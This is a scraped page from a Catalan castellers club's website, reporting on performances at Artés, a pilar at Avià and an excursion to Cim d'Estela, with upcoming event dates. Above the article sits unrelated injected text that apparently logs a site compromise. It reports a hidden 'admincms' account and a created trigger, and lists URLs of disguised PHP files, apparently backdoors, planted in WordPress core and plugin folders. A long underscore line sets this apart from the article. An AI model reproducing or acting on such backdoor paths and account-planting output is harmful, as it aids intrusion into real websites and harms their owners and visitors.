Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/press-this-ajax-response-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/admin-ajax-ajax-response-stream-meta-ajax-response-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/about-ajax-wp-wp-ajax-ajax-response-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/uninstall-stream-meta-meta-core.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-ajax-cron-core-ajax-response-wp.php https://castellersdeberga.cat/wp-includes/lol-meta.php5 https://castellersdeberga.cat/wp-includes/customize/class-wp-customize-date-time-control-core-meta-wp-ajax-response-stream-ajax-response.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Artés i Cim d’Estela
 

Artés i Cim d’Estela


Artés i Cim d’EstelaCap de setmana de molta activitat dels Castellers de Berga. Dissabte 31 d’agost a la tarda, la colla fa fer un pilar davant Avinguda 44, a Avià. Aquest establiment va resultar premiat entre tots els de la campanya Aquí fem pinya 2013. És una manera d’agrair el suport a Castellers de Berga del comerç i empreses de la comarca.
També dissabte 31 d’agost, diada castellera a la Festa Major d’Artés. Amb Salats de Súria i Carallots de Sant Vicenç dels Horts. Els berguedans van descarregar el vuitè 4 de 7. L’actuació sencera fou: pilar de 4, 3 de 6, 4 de 7, 2 de 6 i 2 pilars de 4. Carallots de Sant Vicenç dels Horts, amb pocs mesos de vida, van descarregar 3 castells de 6 pisos.
Diumenge 1 setembre, excursió al Cim d’Estela. Uns 70 castellers de Berga i acompanyants van arribar fins al Coll d’Estela i, després que la majoria fessin cim, van alçar uns pilars amb el Cogulló d’Estela (1862 m) i el Roc d’Auró (1990 m) de fons.
.

La colla torna a actuar el dissabte 14 de setembre a Cal Pons (Puig-reig) on se celebra el V Festival Berguedà Folk. Serà a les 6 de la tarda. Dimarts 10 de setembre, també hi haurà la colla blava a la Marxa de Torxes de Berga. A les 8 del vespre a la Plaça de Sant Pere.